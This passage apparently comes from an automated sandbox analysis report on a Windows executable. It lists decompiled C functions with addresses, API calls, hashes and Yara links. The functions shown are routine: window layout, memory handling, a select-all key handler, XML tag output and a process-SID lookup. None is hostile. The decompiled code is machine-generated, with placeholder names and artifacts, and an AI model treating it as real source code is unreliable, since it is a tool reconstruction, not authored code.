                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                0x004083dc
                                                                                                                0x004083e2
                                                                                                                0x004083e9
                                                                                                                0x004083ea
                                                                                                                0x004083eb
                                                                                                                0x004083f3
                                                                                                                0x004083f6
                                                                                                                0x004083f8
                                                                                                                0x00408401
                                                                                                                0x00408404
                                                                                                                0x00408407
                                                                                                                0x00408409
                                                                                                                0x0040840c
                                                                                                                0x00408413
                                                                                                                0x0040841d
                                                                                                                0x00408427
                                                                                                                0x0040842c
                                                                                                                0x0040842f
                                                                                                                0x00408432
                                                                                                                0x00408435
                                                                                                                0x00408438
                                                                                                                0x00408439
                                                                                                                0x0040843e
                                                                                                                0x0040843f
                                                                                                                0x00408442
                                                                                                                0x0040844a

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252195045-0
                                                                                                                • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                0x00406746
                                                                                                                0x00406746
                                                                                                                0x0040674f
                                                                                                                0x00406751
                                                                                                                0x00406752
                                                                                                                0x00406757
                                                                                                                0x00406758
                                                                                                                0x0040675d
                                                                                                                0x0040675f
                                                                                                                0x00406760
                                                                                                                0x00406765
                                                                                                                0x00406766
                                                                                                                0x0040676e
                                                                                                                0x00406770
                                                                                                                0x00406771
                                                                                                                0x00406776
                                                                                                                0x00406777
                                                                                                                0x0040677f
                                                                                                                0x00406781
                                                                                                                0x00406785
                                                                                                                0x00406787
                                                                                                                0x00406788
                                                                                                                0x0040678e
                                                                                                                0x0040678e
                                                                                                                0x00406790
                                                                                                                0x00406791
                                                                                                                0x00406796
                                                                                                                0x00406798
                                                                                                                0x0040679e
                                                                                                                0x004067a1
                                                                                                                0x004067a4
                                                                                                                0x004067ab

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                0x0040aba8
                                                                                                                0x0040aba9
                                                                                                                0x0040abb0
                                                                                                                0x0040abb2
                                                                                                                0x0040abb5
                                                                                                                0x0040ac19
                                                                                                                0x0040ac2c
                                                                                                                0x0040ac2e
                                                                                                                0x0040ac36
                                                                                                                0x0040ac39
                                                                                                                0x0040ac39
                                                                                                                0x0040ac1b
                                                                                                                0x0040ac21
                                                                                                                0x0040ac21
                                                                                                                0x0040abb7
                                                                                                                0x0040abcb
                                                                                                                0x0040abce
                                                                                                                0x0040abd7
                                                                                                                0x0040abe6
                                                                                                                0x0040abf6
                                                                                                                0x0040abfe
                                                                                                                0x0040ac09
                                                                                                                0x0040ac0f
                                                                                                                0x0040ac12
                                                                                                                0x0040ac4f

                                                                                                                APIs
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                0x00403a7d
                                                                                                                0x00403a8c
                                                                                                                0x00403a9c
                                                                                                                0x00403aba
                                                                                                                0x00403adf
                                                                                                                0x00403ae7
                                                                                                                0x00403af4
                                                                                                                0x00403af4
                                                                                                                0x00403ae7
                                                                                                                0x00403aba
                                                                                                                0x00403a9c
                                                                                                                0x00403b13

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: State$CallMessageProcSendWindow
                                                                                                                • String ID: A
                                                                                                                • API String ID: 3924021322-3554254475
                                                                                                                • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                0x004034f0
                                                                                                                0x004034f8
                                                                                                                0x00403506
                                                                                                                0x00403516
                                                                                                                0x0040351c
                                                                                                                0x00403531
                                                                                                                0x00403537
                                                                                                                0x00403545
                                                                                                                0x0040354a
                                                                                                                0x00403556
                                                                                                                0x00403567
                                                                                                                0x00403575
                                                                                                                0x00403583
                                                                                                                0x00403583
                                                                                                                0x00403586
                                                                                                                0x00403592
                                                                                                                0x00403598
                                                                                                                0x004035ac

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                • memset.MSVCRT ref: 00403537
                                                                                                                • _ultow.MSVCRT ref: 00403575
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset$_ultow
                                                                                                                • String ID: cf@$q
                                                                                                                • API String ID: 3448780718-2693627795
                                                                                                                • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                0x00407e2d
                                                                                                                0x00407e46
                                                                                                                0x00407e48
                                                                                                                0x00407e4d
                                                                                                                0x00407e5f
                                                                                                                0x00407e6b
                                                                                                                0x00407e6f
                                                                                                                0x00407e75
                                                                                                                0x00407e7c
                                                                                                                0x00407e7d
                                                                                                                0x00407e88
                                                                                                                0x00407e8d
                                                                                                                0x00407e8e
                                                                                                                0x00407eaa

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E48
                                                                                                                • memset.MSVCRT ref: 00407E5F
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                0x00405e0a
                                                                                                                0x00405e12
                                                                                                                0x00405e18
                                                                                                                0x00405e1c
                                                                                                                0x00405e1e
                                                                                                                0x00405e1e
                                                                                                                0x00405e24
                                                                                                                0x00405e2c
                                                                                                                0x00405e2e
                                                                                                                0x00405e44
                                                                                                                0x00405e49
                                                                                                                0x00405e4c
                                                                                                                0x00405e4d
                                                                                                                0x00405e68
                                                                                                                0x00405e74
                                                                                                                0x00405e74
                                                                                                                0x00000000
                                                                                                                0x00405e84
                                                                                                                0x00405e8c

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                0x00409a4a
                                                                                                                0x00409a4f
                                                                                                                0x00409a56
                                                                                                                0x00409a5e
                                                                                                                0x00409a60
                                                                                                                0x00409a6e
                                                                                                                0x00409a6e
                                                                                                                0x00409a60
                                                                                                                0x00409a71
                                                                                                                0x00409a76
                                                                                                                0x00000000
                                                                                                                0x00409a78
                                                                                                                0x00000000
                                                                                                                0x00409a89

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                • API String ID: 946536540-379566740
                                                                                                                • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                0x0040588e
                                                                                                                0x0040588f
                                                                                                                0x0040588f
                                                                                                                0x00405892
                                                                                                                0x00405896
                                                                                                                0x004058a9
                                                                                                                0x004058a9
                                                                                                                0x004058ad
                                                                                                                0x004058af
                                                                                                                0x004058b5
                                                                                                                0x004058b6
                                                                                                                0x004058b9
                                                                                                                0x004058c2
                                                                                                                0x004058c3
                                                                                                                0x004058c8
                                                                                                                0x004058d2
                                                                                                                0x004058d4
                                                                                                                0x004058d9
                                                                                                                0x004058e0
                                                                                                                0x004058ea
                                                                                                                0x004058ec
                                                                                                                0x004058ed
                                                                                                                0x004058f2
                                                                                                                0x004058f9
                                                                                                                0x00405902
                                                                                                                0x00405898
                                                                                                                0x00405898
                                                                                                                0x0040589a
                                                                                                                0x0040589c
                                                                                                                0x004058a1
                                                                                                                0x004058a2
                                                                                                                0x004058a5
                                                                                                                0x004058a7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004058a7
                                                                                                                0x00405912
                                                                                                                0x00405915
                                                                                                                0x0040591e
                                                                                                                0x0040591e
                                                                                                                0x00405907
                                                                                                                0x0040590b

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
